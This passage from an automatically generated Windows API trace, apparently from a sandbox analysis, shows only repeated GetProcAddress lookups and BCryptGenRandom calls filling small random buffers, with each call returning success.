0x7ffc5bcc36b0 [0242.352] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0242.352] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.352] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0242.352] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.352] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0242.352] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.352] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0242.353] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.353] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0242.353] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.353] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0242.353] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.353] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0242.353] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.353] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a02068, cbBuffer=0x2e, dwFlags=0x2 | out: pbBuffer=0x3a02068) returned 0x0 [0242.354] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.354] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0242.354] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.354] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0242.354] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.354] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0242.354] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.354] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0242.354] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.354] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0242.355] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.355] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0242.355] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.355] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0242.355] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.355] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0242.355] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.355] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0242.355] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.355] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0242.355] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.355] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0242.356] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.356] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0242.356] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.356] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0242.356] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.356] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0242.356] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.356] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0242.356] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.356] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0242.356] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.357] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0242.357] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.357] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0242.357] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.357] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0242.357] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.357] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0242.402] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.402] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0242.402] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.402] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0242.402] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.402] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0242.402] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.402] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0242.403] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.403] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0242.403] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.403] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0242.403] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.403] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0242.403] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.403] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0242.403] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.404] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0242.404] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.404] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0242.404] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.404] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0242.404] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.404] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0242.404] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.404] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0242.404] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.404] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0242.405] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.405] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0242.405] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.405] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0242.405] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.405] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0242.405] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.405] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a02096, cbBuffer=0x2f, dwFlags=0x2 | out: pbBuffer=0x3a02096) returned 0x0 [0242.405] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.405] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0242.406] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.406] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0242.406] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.406] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0242.406] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.406] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0242.406] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.406] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0242.406] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.406] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0242.407] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.407] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0242.407] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.407] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0242.407] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.407] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0242.407] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.407] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0242.408] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.408] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0242.408] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.408] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0242.408] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.408] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0242.408] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.408] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0242.408] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.409] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0242.409] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.409] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0242.409] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.409] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0242.409] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.409] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0242.410] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.410] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0242.410] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.410] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0242.410] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.410] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0242.411] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.411] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0242.411] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.411] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0242.411] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.411] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0242.411] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.411] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0242.412] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.412] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0242.412] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.412] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0242.412] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.412] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0242.413] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.413] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0242.413] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.413] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0242.413] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.413] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0242.413] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.413] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0242.413] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.413] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0242.414] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.414] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0242.414] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.414] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0242.414] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.414] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0242.414] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.414] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0242.414] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.414] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0242.415] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.415] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0242.415] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.415] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0242.415] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.415] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a020c5, cbBuffer=0x1f, dwFlags=0x2 | out: pbBuffer=0x3a020c5) returned 0x0 [0242.415] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.415] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0242.415] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.415] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0242.415] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.415] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0242.416] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.416] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0242.416] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.416] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0242.416] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.416] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0242.416] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.416] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0242.417] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.417] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0242.417] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0242.417] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: 